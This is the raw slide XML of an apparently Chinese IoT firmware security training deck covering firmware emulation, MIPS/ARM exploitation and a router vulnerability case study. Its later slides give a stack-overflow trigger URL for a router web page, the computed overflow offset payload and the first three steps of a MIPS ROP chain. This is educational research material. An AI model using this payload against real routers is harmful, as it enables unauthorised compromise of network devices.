                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>固件模拟概述</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="28" name="组合 27"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3224530" y="2526030"/>
            <a:ext cx="4407535" cy="572135"/>
            <a:chOff x="4448" y="2628"/>
            <a:chExt cx="6941" cy="901"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="29" name="图片 28" descr="PPT调整"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId1"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="4448" y="2628"/>
              <a:ext cx="6941" cy="610"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="30" name="文本框 29"/>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03</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="31" name="文本框 30"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5941" y="2658"/>
              <a:ext cx="4861" cy="871"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0" anchor="t">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1500" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>MISP PWN &amp; ARM PWN</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="32" name="组合 31"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3224530" y="3061970"/>
            <a:ext cx="4407535" cy="572135"/>
            <a:chOff x="4448" y="2628"/>
            <a:chExt cx="6941" cy="901"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="33" name="图片 32" descr="PPT调整"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId1"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="4448" y="2628"/>
              <a:ext cx="6941" cy="610"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="34" name="文本框 33"/>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04</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="35" name="文本框 34"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5941" y="2658"/>
              <a:ext cx="4861" cy="871"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0" anchor="t">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1500" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>固件中常见安全漏洞</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="36" name="组合 35"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3224530" y="3597910"/>
            <a:ext cx="4407535" cy="572135"/>
            <a:chOff x="4448" y="2628"/>
            <a:chExt cx="6941" cy="901"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="37" name="图片 36" descr="PPT调整"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId1"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="4448" y="2628"/>
              <a:ext cx="6941" cy="610"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="38" name="文本框 37"/>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05</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="39" name="文本框 38"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5941" y="2658"/>
              <a:ext cx="4861" cy="871"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0" anchor="t">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1500" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>实战 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1500" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>IOT </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1500" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>设备固件漏洞分析</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="41" name="文本框 40"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="917517" y="1206500"/>
            <a:ext cx="4215130" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Contents</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:solidFill>
                <a:srgbClr val="1F2A66"/>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系统模式固件模拟</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1F2A66"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="图片 1"/>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0" y="3623310"/>
            <a:ext cx="9144000" cy="1226820"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="图片 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4104640" y="1106170"/>
            <a:ext cx="4889500" cy="2934970"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="图片 6"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="316865" y="3030220"/>
            <a:ext cx="2131695" cy="4298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关键函数 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>hook</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1F2A66"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="图片 5"/>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5121275" y="884555"/>
            <a:ext cx="4016375" cy="2191385"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="图片 12"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="3951605" y="1840865"/>
            <a:ext cx="952500" cy="952500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="10" name="组合 9"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3655695" y="233680"/>
            <a:ext cx="3775710" cy="396240"/>
            <a:chOff x="90" y="2951"/>
            <a:chExt cx="5946" cy="624"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="5" name="图片 4"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId3">
              <a:clrChange>
                <a:clrFrom>
                  <a:srgbClr val="F8F8F8">
                    <a:alpha val="100000"/>
                  </a:srgbClr>
                </a:clrFrom>
                <a:clrTo>
                  <a:srgbClr val="F8F8F8">
                    <a:alpha val="100000"/>
                    <a:alpha val="0"/>
                  </a:srgbClr>
                </a:clrTo>
              </a:clrChange>
            </a:blip>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="90" y="2976"/>
              <a:ext cx="5946" cy="589"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="矩形 7"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="90" y="2951"/>
              <a:ext cx="5876" cy="624"/>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图片 8"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="704215" y="2996565"/>
            <a:ext cx="5468620" cy="18770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漏洞分析</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"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sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0x457574 -&gt; writePageParamSet -&gt; stringModify</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1F2A66"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="图片 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="196850" y="3409315"/>
            <a:ext cx="5829300" cy="12858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payload</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1F2A66"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="文本框 15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="603250" y="174688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sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://192.168.1.64/{path}/userRpm/popupSiteSurveyRpm_AP.htm?mode=1&amp;curRegion=1&amp;chanWidth=1&amp;channel=1&amp;ssid=/%0A/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>%0A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>%0A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>%0A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>...</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1F2A66"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="图片 1"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1434465" y="2406015"/>
            <a:ext cx="7403465" cy="24555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栈溢出触发</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1F2A66"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="文本框 15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="603250" y="174688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静态编译 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>gdbserver </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>进行调试</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经过计算得到偏移为 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>14</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>'/%0A'*0x55+'a'*14</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>）</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1F2A66"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="图片 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4126865" y="876300"/>
            <a:ext cx="3424555" cy="39344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ROP chain </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>构造 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Step1</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"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控制当前的函数栈末尾的寄存器参数</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1F2A66"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>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797040" y="1001395"/>
            <a:ext cx="3213100" cy="3562350"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="图片 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="127635" y="3625850"/>
            <a:ext cx="7067550" cy="937895"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="430530" y="3066415"/>
            <a:ext cx="2834640" cy="441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缓存刷新机制</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"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cach</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>e</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t> incoherency</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数据缓冲区和指令缓冲区</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1F2A66"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>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71260" y="955675"/>
            <a:ext cx="3213100" cy="3562350"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="201295" y="3124835"/>
            <a:ext cx="6069965" cy="14941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ROP chain </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>构造 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Step2</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"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跳转到 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>li $a0,xx </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>指令处，布置好下一跳的寄存器 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>s1</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1F2A66"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="图片 1"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4396105" y="1637030"/>
            <a:ext cx="4522470" cy="2947035"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="603250" y="3293110"/>
            <a:ext cx="3652520" cy="4705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ROP chain </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>构造 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Step3</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"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跳转栈的末尾指令处，控制 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>s0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>s1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
